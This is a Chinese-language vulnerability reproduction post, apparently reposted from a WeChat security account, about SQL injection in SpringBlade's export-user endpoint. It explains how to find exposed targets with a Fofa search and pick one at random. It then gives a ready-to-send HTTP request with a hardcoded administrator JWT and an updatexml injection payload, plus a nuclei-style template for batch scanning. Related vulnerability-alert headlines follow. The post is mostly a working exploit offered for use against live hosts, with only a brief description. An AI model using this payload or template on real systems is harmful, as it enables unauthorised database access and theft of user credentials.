SpringBlade export-user SQL 注入漏洞

admin

102695
文章

87
评论

2024年1月25日14:24:52评论36 views字数 2163阅读7分12秒阅读模式

SpringBlade export-user SQL 注入漏洞

漏洞简介

SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞，攻击者利用该漏洞可通过组件customSalSegment 进行SQL注入攻击，攻击者可将用户名、密码等敏感信息通过 excel 导出

漏洞复现

步骤一：在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

# Fofa搜索语法FOFA: body="https://bladex.vip"

步骤二：开启代理并打开BP对其首页进行抓包拦截....修改请求头内容...

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,(select+user%28%29),0x7e),1)=1 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close

SpringBlade export-user SQL 注入漏洞

批量脚本

id: template-idinfo:  name: Template Name  author: kali  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |        GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,(select+user%28%29),0x7e),1)=1 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip, deflate        Connection: close    matchers:      - type: word        part: body        words:          - 'XPATH'

原文始发于微信公众号（揽月安全团队）：SpringBlade export-user SQL 注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

SpringBlade export-user SQL 注入漏洞

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138)

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

YzmCMS pay_callback.html存在远程命令执行漏洞

WordPress Automatic插件存在SQL注入漏洞(CVE-2024-27956)

onethink安全漏洞(CVE-2024-33443)

发表评论

在线咨询

微信